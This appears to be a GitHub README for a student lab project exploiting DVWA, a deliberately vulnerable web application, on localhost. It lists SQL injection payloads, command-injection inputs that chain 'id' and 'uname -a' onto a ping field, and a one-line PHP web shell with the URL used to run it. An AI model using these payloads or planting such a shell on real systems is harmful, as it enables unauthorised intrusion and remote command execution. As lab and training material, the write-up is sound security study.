Author: Shreya Saxena
Type: Web Application Penetration Testing Project
Environment: Kali Linux + DVWA (Damn Vulnerable Web Application)
This project demonstrates hands-on exploitation of real-world web application vulnerabilities using DVWA.
The goal was to understand how insecure coding practices lead to high-risk security flaws such as:
SQL Injection (UNION, Error-based, Boolean-based)
Command Injection (RCE)
File Upload leading to Remote Code Execution
Poor access control and missing server validation
Tools Used
Kali Linux (VirtualBox)
Apache2 Web Server
PHP Modules (gd, curl, mysqli, zip)
MariaDB Database
DVWA Web Application
Deployment Steps
Installed all dependencies
Configured DVWA at:
/var/www/html/dvwa/
Updated database credentials in config.inc.php
Set DVWA Security Level → Low
Enabled permissions for upload & config folders
Successfully tested SQL, Command & File Upload vulnerabilities
🔹 1. SQL Injection (UNION / Boolean / Error-Based)
Payloads used:
1'
1 UNION SELECT 1, version() --
1 ORDER BY 2 --
1 AND ASCII(SUBSTRING(@@version,1,1)) = 50 --
Outcome
Extracted MySQL version
Enumerated columns
Performed boolean-based extraction
Bypassed SQL query logic successfully
🔹 2. Command Injection (Remote Code Execution)
Payloads:
127.0.0.1; id
127.0.0.1; uname -a
DVWA executed system commands with web-server privileges, proving command injection vulnerability.
🔹 3. File Upload → Web Shell Execution
Uploaded PHP shell:
<?php system($_GET['cmd']); ?>
Executed commands via:
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=id
Gained remote system command execution.
📁 Screenshots Folder
All project evidence (setup, exploits, results) is stored in the screenshots/ folder.
It includes:
SQL Injection exploitation proof
Command Injection output
File Upload → Shell Execution
DVWA configuration steps
System information after RCE
This acts as visual documentation for reviewers.
If someone wants to replicate your project:
1️⃣ Clone this repository
git clone https://github.com/shreyasaxena725-oss/DVWA-Vulnerability-assessment-kali.git
2️⃣ Start Apache & MariaDB
sudo systemctl start apache2
sudo systemctl start mysql
3️⃣ Open DVWA in browser
4️⃣ Login
Default credentials:
admin / password
5️⃣ Set DVWA Security Level → Low
To allow all vulnerabilities for learning/testing.
🏁 Conclusion
This project demonstrates:
✔ Practical exploitation of multiple real-world vulnerabilities
✔ Ability to configure a vulnerable lab environment
✔ Database, file upload, and command execution attacks
✔ Strong understanding of how insecure coding leads to critical risks
This project showcases my skills in:
Web Penetration Testing
Kali Linux
Vulnerability Assessment
Secure Coding Practices
Real Exploitation of DVWA Components
⭐ If You Found This Useful
Give the repository a ⭐ on GitHub — it supports my work and growth!